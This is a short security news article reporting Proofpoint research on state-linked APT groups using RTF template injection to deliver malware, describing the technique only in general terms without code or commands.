Several state-backed hacker syndicates have returned to using old-school malware distribution techniques but they are still effective.
According to security researchers at Proofpoint, several advanced persistent threat (APT) syndicates working on behalf of Russia, China, and India, use the rich text format (RTF) to infiltrate the malware.
Inserting malware into RTF documents is definitely not new, as it has been around for a long time. However, this technique is still effective today.
This is because malware in RTF is difficult to detect by antivirus software, and many companies do not block RTF attachments in email, because this is the format they use in their daily business operations.
The technique itself is called RTF template injection. It works by modifying the properties of the RTF document, which allows the document to be 'armed' with a series of codes to secretly download malware onto the victim's computer.
The only tricky part of this technique is how to convince potential victims to open and turn on the edit options in the document, so that the document can start downloading malware.
However, this step can be done with the right social engineering techniques, namely mapping the victim well so that they can choose documents that will attract their attention.
This RTF technique is not complicated, in fact it is much simpler than many other techniques but can still give the same results.
"Despite the name advanced persistent threat, if APT actors do their job well, they need very little work and resources to gain access to a particular company or organization," said Sherrod DeGrippo, VP of Threat Research and Detection at Proofpoint.
"That way, the perpetrators can keep their more sophisticated tools hidden if they are caught," he added.
So far, the use of the RTF technique by the APT syndicate was in February 2021, which was carried out by the DoNot Team, an APT syndicate linked to the Indian government. Since then, more attacks with the APT technique have occurred around the world.